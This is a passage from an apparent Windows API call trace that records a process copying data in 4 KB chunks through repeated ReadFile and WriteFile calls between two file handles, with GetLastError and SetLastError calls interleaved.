lpOverlapped=0x0) returned 1 [0103.284] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] GetLastError () returned 0x0 [0103.284] SetLastError (dwErrCode=0x0) [0103.284] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.285] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.285] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] GetLastError () returned 0x0 [0103.285] SetLastError (dwErrCode=0x0) [0103.285] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.285] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.286] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] GetLastError () returned 0x0 [0103.286] SetLastError (dwErrCode=0x0) [0103.286] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.286] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.287] GetLastError () returned 0x0 [0103.287] SetLastError (dwErrCode=0x0) [0103.287] GetLastError () returned 0x0 [0103.287] SetLastError (dwErrCode=0x0) [0103.287] GetLastError () returned 0x0 [0103.287] SetLastError (dwErrCode=0x0) [0103.287] GetLastError () returned 0x0 [0103.287] SetLastError (dwErrCode=0x0) [0103.287] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.457] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.458] SetLastError (dwErrCode=0x0) [0103.459] SetLastError (dwErrCode=0x0) [0103.459] SetLastError (dwErrCode=0x0) [0103.459] SetLastError (dwErrCode=0x0) [0103.459] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.460] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.460] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] SetLastError (dwErrCode=0x0) [0103.460] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.461] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.461] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] SetLastError (dwErrCode=0x0) [0103.461] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.461] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.462] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] SetLastError (dwErrCode=0x0) [0103.462] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.462] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.462] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.463] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.463] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] SetLastError (dwErrCode=0x0) [0103.463] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.463] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.464] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.464] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.464] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.464] SetLastError (dwErrCode=0x0) [0103.464] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.465] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.465] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] SetLastError (dwErrCode=0x0) [0103.465] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.466] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.466] SetLastError (dwErrCode=0x0) [0103.466] SetLastError (dwErrCode=0x0) [0103.466] SetLastError (dwErrCode=0x0) [0103.466] SetLastError (dwErrCode=0x0) [0103.466] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.466] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.466] SetLastError (dwErrCode=0x0) [0103.466] SetLastError (dwErrCode=0x0) [0103.466] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.466] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.467] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.468] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.468] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.468] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.468] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.468] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.469] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.470] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.471] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.472] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.473] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.473] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.473] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.473] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.474] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.475] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 